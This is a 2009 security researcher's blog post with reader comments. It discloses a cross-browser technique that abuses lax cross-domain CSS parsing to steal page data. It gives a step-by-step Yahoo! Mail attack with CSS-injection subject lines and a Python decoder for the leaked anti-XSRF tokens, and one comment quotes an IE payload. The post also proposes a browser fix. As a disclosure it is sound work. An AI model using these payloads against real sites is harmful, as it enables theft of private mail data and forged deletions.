Monday, December 28, 2009

Generic cross-browser cross-domain theft

Well, here's a nice little gem for the festive season. I like it for a few distinct reasons:

  1. It's one of those cases where if you look at web standards from the correct angle, you can see a security vulnerability specified.

  2. Accordingly, it affected all 5 major browsers. And likely the rest.

  3. You can still be a theft victim even with plugins and JavaScript disabled!
It's much less serious than it could be because there are restrictions on the format of cross-domain data which can be stolen, and the attacker needs to be able to exercise limited control of the target theft page.
The issue is best introduced with an example. The example chosen is deliberately a little bit involved and not too severe. This is to give the upcoming browser updates a chance to get deployed.

Example: Yahoo! Mail cross-domain subject line theft and e-mail deletion

(It's important to note there is no apparent failing of the web app in question here).

  • Step 1: E-mail your victim@yahoo.com with the subject line ');}

  • Step 2: Wait a bit (assume that other e-mails are delivered to the victim at this time)

  • Step 3: E-mail your victim@yahoo.com with the subject line {}body{background-image:url('http://google.com/ and include in the body: PLEASE CLICK http://cevans-app.appspot.com/static/yahoocss.html

  • Step 4: Mild profit if the victim clicks the link.

If you set up the above scenario as a test, you might see something like this in an alert box upon clicking the link:

url(http://google.com/%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3493_AGvHtEQAAWFgSgIzgAlWYQXHqDY&3=q%22%3ESuper%20sensitive%20subject%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3933_AGTHtEQAAM%2FHSgIzawpE8Fwm1%2FI&5=x%22%3E)

The above text is stolen cross-domain, and the interesting pieces are highlighted in bold. The data includes the subjects, senders and "mid" value for all e-mails received between the two set-up e-mails we sent the victim.
Although leaking of subjects and senders is not ideal, it's the "mid" value that interests us most as an attacker. This would appear to be a secure / unguessable ID. Accordingly, it is reasonable for the mail application to rely on it as a distinct anti-XSRF token. This is indeed the case for the "delete" operation, implemented as a simple HTTP GET request. Interestingly, the "forward" operation seems to have an additional anti-XSRF token in the POST body, making the "mid" leak not nearly as serious as it could have been.
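
To make the leaked blob easier to read, here is a minimal Python sketch of how an attacker might decode it. It assumes the percent-encoded text has already been captured (from the alert box or a web server log); the sample is a shortened copy of the output above, and the function name and regular expressions are illustrative only, tuned to this one sample rather than to Yahoo! Mail's markup in general.

```python
import re
from urllib.parse import unquote

# Shortened copy of the leaked text shown above (percent-encoded by the browser).
leaked = (
    "url(http://google.com/%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans"
    "%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E"
    "%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail"
    "?fid=Inbox&mid=1_3493_AGvHtEQAAWFgSgIzgAlWYQXHqDY&3=q%22%3E"
    "Super%20sensitive%20subject%3C/a%3E)"
)


def extract_leak(leaked_url):
    """Decode the stolen URL and pull out the fields the post talks about.

    The patterns below are assumptions that fit the sample markup only.
    """
    html = unquote(leaked_url)  # turn %3C, %22, %20 ... back into HTML
    return {
        "mids": re.findall(r'[?&]mid=([^&"]+)', html),
        "subjects": re.findall(r'<a href="[^"]*">([^<]*)</a>', html),
        "senders": re.findall(r'<span class="j">([^<]*)</span>', html),
    }
```

Calling extract_leak(leaked) on this sample yields one "mid" value, one subject and one sender, which is all the attacker needs in order to forge the "delete" GET request.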

That's how this whole attack proceeds in its most powerful form: leak a small amount of text cross-domain, and then bingo! if the leaked text happens to include a global anti-XSRF token.

How does it work?

It works by abusing the standards relating to the loading of CSS style sheets. Approximately, the standards are:

  • Send cookies on any load of CSS, including cross-domain.

  • When parsing the returned CSS, ignore any amount of crap leading up to a valid CSS descriptor.
By controlling a little bit of text in the victim domain, the attacker can inject what appears to be a valid CSS string. It does not matter what precedes this CSS string: HTML, binary data, JSON, XML. The CSS parser will ruthlessly hunt down any CSS constructs within whatever blob is pulled from the victim's domain. To the CSS parser, the text in the above attack looks like this:

(some HTML junk; whatever){} body{background-image:url('http://google.com/%3C/a...stolen stuff...')}(some trailing HTML junk)

So, the background of the attacker's page will be styled with a background image loaded from an URL, the path of which contains stolen data! One lovely twist of using a CSS string which is an URL is that it will be automatically fetched even if JavaScript is turned off! The stolen data is then harvested by the attacker from their web server logs.
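
The parser's view can be approximated with a toy model in Python. This is only a sketch: a single regular expression stands in for a forgiving CSS parser, and the sample page, its markup and the function name are all invented for illustration. Real browser parsers are far more general.

```python
import re

# Toy stand-in for a forgiving CSS parser: the leading junk is swallowed as a
# garbage selector closed by "{}", after which a normal rule is parsed.
# A quoted CSS string may not contain a raw newline, hence [^'\n].
RULE = re.compile(
    r"\{\}\s*body\s*\{\s*background-image\s*:\s*url\('([^'\n]*)'\)\s*;?\s*\}"
)

# Hypothetical inbox page: newest message first, attacker subjects at both ends.
sample_page = (
    '<div><a href="/msg?mid=3">{}body{background-image:url(\'http://google.com/</a>'
    '<a href="/msg?mid=SECRET">Super sensitive subject</a>'
    '<a href="/msg?mid=1">\');}</a></div>'
)


def stolen_url(response_body):
    """Return the URL the 'stylesheet' would make the browser fetch, or None."""
    match = RULE.search(response_body)
    return match.group(1) if match else None
```

For sample_page, stolen_url returns the google.com URL with the victim's markup (including mid=SECRET) appended as its path. Inserting a newline into the middle message, or HTML-escaping the ' characters, makes it return None.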
Fortunately, there are various barriers to exploiting this:

  • Any newlines in the injected string break the CSS parse. This is a very common condition which stops potentially serious attacks.

  • CSS strings may be quoted within the ' or " characters. In a context where both of these are escaped (HTML escaped, URL escaped, whatever), it will not be possible to inject a CSS string.

  • The attacker needs control of two injection points: pre-string and post-string. For many sensitive pages, the attacker won't have sufficient influence over the page data via URL params or reflection of attacker data.
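
These barriers can be expressed as a rough checklist. The Python sketch below is an assumption-laden illustration, not a scanner: it takes the response body as the victim's browser would receive it and reports whether the two injected fragments from the example survived intact. The constant and function names are made up for this sketch.

```python
# The two attacker-controlled fragments from the Yahoo! Mail example.
PREFIX = "{}body{background-image:url('http://google.com/"
SUFFIX = "');}"


def injection_survives(page, prefix=PREFIX, suffix=SUFFIX):
    """Return (ok, reason) for a response body containing both injections."""
    start = page.find(prefix)
    if start == -1:
        return False, "pre-string fragment missing or escaped"
    end = page.find(suffix, start + len(prefix))
    if end == -1:
        return False, "post-string fragment missing or escaped"
    captured = page[start + len(prefix):end]
    if "\n" in captured or "\r" in captured:
        return False, "newline inside the would-be CSS string"
    if "'" in captured:
        return False, "stray quote ends the CSS string early"
    return True, "both fragments intact, nothing between them breaks the string"
```

A page that HTML-escapes ' fails the first check, and a page with one message per line fails the newline check, which matches the observation that newlines are the most common thing standing in the way.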
General areas that are more susceptible to this attack include:

  • JSON / XML feeds (common lack of newlines; no requirement to escape " (JSON strings) or ' (XML text nodes)).

  • Socially-related websites (the victim is always browsing attacker-controlled strings such as comments on their mundane photos, etc).

How do we fix it?

It would be nice to be able to not send cookies for cross-domain CSS loads; however that would certainly break stuff and it's hard to measure what without actually causing the breakage.

It would be nice to be strict on the MIME type when loading CSS resources -- if not globally then at least for cross-domain loads. But this breaks high profile sites, *cough* configure.dell.com and text/plain *cough*. (To be fair, it gets much worse with many sites even using text/html, application/octet-stream, it goes on).

A good balance is to require the alleged CSS to at least start with well-formed CSS, iff it is a cross-domain load and the MIME type is broken. This is the approach I used in my pending WebKit patch.
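
As a rough illustration of that rule, here is a Python sketch of the decision. It is not the WebKit patch: the function names are hypothetical, and the regular expression is a deliberately crude stand-in for "starts with well-formed CSS".

```python
import re
from urllib.parse import urlsplit

# Crude assumption of what "starts with well-formed CSS" means: optional
# comments, then either an @-rule or "selector { prop: value; ... }".
LEADING_CSS = re.compile(
    r"\s*(?:/\*.*?\*/\s*)*"
    r"(?:@[a-zA-Z-]+\b"
    r"|[\w\s.#:,*>+~-]+\{\s*(?:[a-zA-Z-]+\s*:[^{};]*;\s*)*(?:[a-zA-Z-]+\s*:[^{};]*)?\})",
    re.DOTALL,
)


def origin(url):
    parts = urlsplit(url)
    return (parts.scheme, parts.hostname, parts.port)


def should_apply_stylesheet(page_url, css_url, content_type, body):
    """Only cross-domain loads with a wrong MIME type get the strict check."""
    mime = content_type.split(";")[0].strip().lower()
    if origin(page_url) == origin(css_url):
        return True  # same-domain loads keep the old lax behaviour
    if mime == "text/css":
        return True  # correctly labelled CSS is accepted as before
    return LEADING_CSS.match(body) is not None
```

Under this sketch, a cross-domain text/html response that begins with HTML markup is rejected, while a site serving real CSS as text/plain keeps working because its response starts with a recognisable rule.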

Note that fixing this issue also fixes my previous attack of using cross-domain CSS to reliably tell if someone is logged in or not:

http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html

Credits

  • Aaron Sigel, for interesting discussions about using /* styled multi-line comments to bypass the newline restriction. Looks like it's not possible to recover comment text but we didn't test all the browsers.

  • Opera, for seemingly fixing this in v10.10 - although I don't know the exact heuristic used.

  • The WebKit and Mozilla communities for good feedback on approaches and patches.

20 comments:

Asirap said...

Sweet P.O.C. I'd actually be really curious how many legit pages break if you prevented cookies being sent with cross-domain CSS loads. I wouldn't expect this number to be too high, though I agree that stricter CSS validation is the better route.

jd said...

Shouldn't the mimetype prevent yahoocss.html from loading the email as a stylesheet?

Chris Evans said...

@jd: No, browsers will ignore the MIME type (unless they are in standards mode, but this is not a default configuration and the evil page loading the CSS can often change modes itself). The reason browsers ignore the MIME type to load CSS is that there are unfortunately a bunch of web sites out there that serve CSS with broken MIME types.

Anonymous said...

How is it not the application's fault if the attack relies on being able to inject code? I don't see how this is any different than the traditional JavaScript injection attacks, except that this uses CSS and works with JS disabled.

What is it that developers should never trust? Oh yeah, it's user submitted data.

Chris Evans said...

@Anonymous: I recommend a more careful reading of the blog post. What's the bug in Yahoo! Mail? (There isn't one.) We're not talking about a JavaScript injection (caused by failure to HTML escape, JS escape, etc). We're talking about making a CSS construct appear in the victim's page / feed / JSON API / etc. This uses characters such as { which remain intact even with correct escaping in the application.

Anonymous said...

And if the injected subject line doesn't use a single or double quote, the attack doesn't work, now does it? You said it yourself:

"CSS strings may be quoted within the ' or " characters. In a context where both of these are escaped (HTML escaped, URL escaped, whatever), it will not be possible to inject a CSS string."

I don't know how I could read that any differently. Either single/double quotes are escaped properly or they aren't. If they aren't, the application is at fault, it doesn't matter what kind of application it is.

Chris Evans said...

@Anonymous: ah, thanks for the clarification, now I see the bit you're missing. You do ask a good question. The HTML characters it is mandatory to escape vary depending on context. For example, inside a "-quoted HTML attribute value, you absolutely need to escape " characters. However inside of a tag, such as hello"quote things are different. There are similar subtleties to the escaping rules for XML and JSON, involving ' vs " that make those particularly interesting vectors too.

Chris Evans said...

Ehh... my bold tag got parsed, hello"quote should be surrounded by a b tag in the example.

tentacoloViola said...

Hi Chris, kudos for your research, I've found it very interesting. However, I think there is another constraint for this technique to work: HTTP requests for CSS are done using GET, so it is impossible to perform a cross-domain theft on resources that are retrieved through POST requests. Do you agree?

Chris Evans said...

@tentacoloViola: Yes :)

Isaac said...

Hey Chris, been a while ;D. This reminds me of the CSS injection bug found by a guy over here:
http://d.hatena.ne.jp/ofk/20081111/1226407593. If you can inject portions of CSS into a field and have it displayed, ie6 (maybe 7?) would parse it as valid css and allow you to read data contained in the field. for example using a css import: @import url("http://google.co.jp/search?source=ig&hl=en&rlz=&=&q={}body{font-family:");
Then you were able to read portions of the document like: alert(document.body.currentStyle.fontFamily).

Anonymous said...

You could just escape characters like { to &#123; and : to &#58; but you shouldn't have to resort to that!

bcdalai said...

This is a very important article for everyone and especially for me, because I'm using many web services with networking and micro-blogging tools that often use cross-domain CSS. And thanks to Chris Evans.

Anonymous said...

Scary!
Would this "vector" be broken, if one denies "third party" cookies ?

mu said...

Scary!
Would this "vector" be broken, if one denies "third party" cookies ?

yes

James Kettle said...

That is a brilliant technique. Thanks for sharing it. These rareish flaws stack up.

kozmic said...

You mention talking with different browser vendors. Has anyone besides Opera implemented fixes? If so, it would be interesting to know what approach they have taken.

Buge said...

@mu

I'm pretty sure you're wrong. Third party cookies have to do with how cookies are set.

This exploit doesn't involve setting any cookies in weird ways. It just sends the cookies in weird ways.

Anonymous said...

First, shouldn't "A good balance is to require the alleged CSS to at least start with well-formed CSS, iff it is a cross-domain load and the MIME type is broken." use "only if" instead of "iff" (if and only if)? As written, it can be read as saying that you may only use well-formed CSS if the load is cross-domain and the MIME type is broken. Presuming that "iff" takes precedence over "and", this implies that you may not use well-formed CSS on a same-domain request; otherwise, if "and" takes precedence over "iff", it implies that you may not use well-formed CSS on a request which is on the same domain and has a valid MIME type. Anyway, that's not too important, just being a bit pedantic; perhaps I'm wrong.

Now my question: I know this is an old post and things may have been different back then, but hasn't CSS only ever been parsed inside of a designated area such as a style tag or the style attribute? If so, why would user input ever end up in there in the Yahoo email subject? The example doesn't explicitly state you added an element; also, from your comments it'd seem that there was no HTML injection, so I don't see how that could have even been parsed as CSS instead of just plain text or rather HTML.

In addition, I had to re-read the article and comments to presume you mean that the link to "http://cevans-app.appspot.com/static/yahoocss.html" will be requested and included into the document as a CSS document. I fail to see how. First, it's included part way through a background-image: url(); argument, so the actual domain being requested should be google.com and everything following should be part of the requested URI, not a new request. That isn't much of a problem: you control the initial URL anyway, so you could change that to your malicious domain. Okay, so the request is made as if to an image, which could contain its own style tags which would get parsed, but this doesn't explain why the aforementioned URI is relevant. I assume you were saying that the background-image would be parsed and the XSRF tokens contained in the URI could be used to forge a GET request by the requested background-image URI?

So, to reiterate: why would the CSS parser parse the entire document? Isn't the entire point of the style tag/attribute to indicate where CSS exists and should be parsed from?
And what relevance has the second link in the background-image URI?

Anonymous said...

You had me until you said "an URL".